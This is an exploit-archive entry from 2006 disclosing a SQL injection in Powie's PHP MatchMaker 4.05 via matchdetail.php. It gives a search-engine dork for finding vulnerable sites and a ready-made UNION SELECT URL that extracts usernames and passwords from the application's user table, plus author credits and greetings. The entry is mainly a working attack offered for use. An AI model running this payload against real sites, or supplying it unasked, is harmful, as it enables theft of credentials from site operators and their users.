[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability
# Published : 2006-11-17
# Author : SHiKaA
# Previous Title : Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability
# Next Title : mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability
#==============================================================================================
#Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.powie.de
#
#Version : v4.05
#
#===============================================================================================
#
#DORK : "Powie's PSCRIPT MatchMaker 4.05"
#
#
#Exploit :
#--------------------------------
#
#http://target.com/(path to script)/matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , Coder-AZH@CKTEAM
==================================================================================================
# www.Syue.com [2006-11-17]